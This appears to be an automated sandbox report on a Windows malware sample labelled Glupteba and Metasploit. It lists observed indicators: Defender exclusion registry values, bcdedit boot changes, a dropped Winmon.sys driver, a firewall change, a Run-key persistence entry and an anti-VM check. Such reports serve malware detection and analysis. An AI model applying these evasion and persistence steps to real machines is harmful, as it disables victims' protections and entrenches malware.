memory/4552-1-0x0000000001FD0000-0x00000000020D0000-memory.dmp
memory/4552-2-0x0000000003990000-0x00000000039C0000-memory.dmp
memory/4552-3-0x0000000000400000-0x0000000000433000-memory.dmp
memory/4552-4-0x0000000003AE0000-0x0000000003B04000-memory.dmp
memory/4552-5-0x00000000064C0000-0x0000000006A64000-memory.dmp
memory/4552-6-0x0000000003EF0000-0x0000000003F12000-memory.dmp
memory/4552-7-0x0000000000400000-0x0000000001D88000-memory.dmp
memory/4552-8-0x0000000006A70000-0x0000000007088000-memory.dmp
memory/4552-9-0x0000000007100000-0x0000000007112000-memory.dmp
memory/4552-10-0x0000000007120000-0x000000000722A000-memory.dmp
memory/4552-11-0x0000000007230000-0x000000000726C000-memory.dmp
memory/4552-12-0x00000000072B0000-0x00000000072FC000-memory.dmp
memory/4552-13-0x0000000001FD0000-0x00000000020D0000-memory.dmp
memory/4552-15-0x0000000003990000-0x00000000039C0000-memory.dmp
memory/4552-16-0x0000000000400000-0x0000000000433000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240729-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\LittleSea = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6c5db6dce13ded4e0e6c7e9a526b063e.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6c5db6dce13ded4e0e6c7e9a526b063e.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\LittleSea = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\LittleSea = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241108014118.cab | C:\Windows\system32\makecab.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
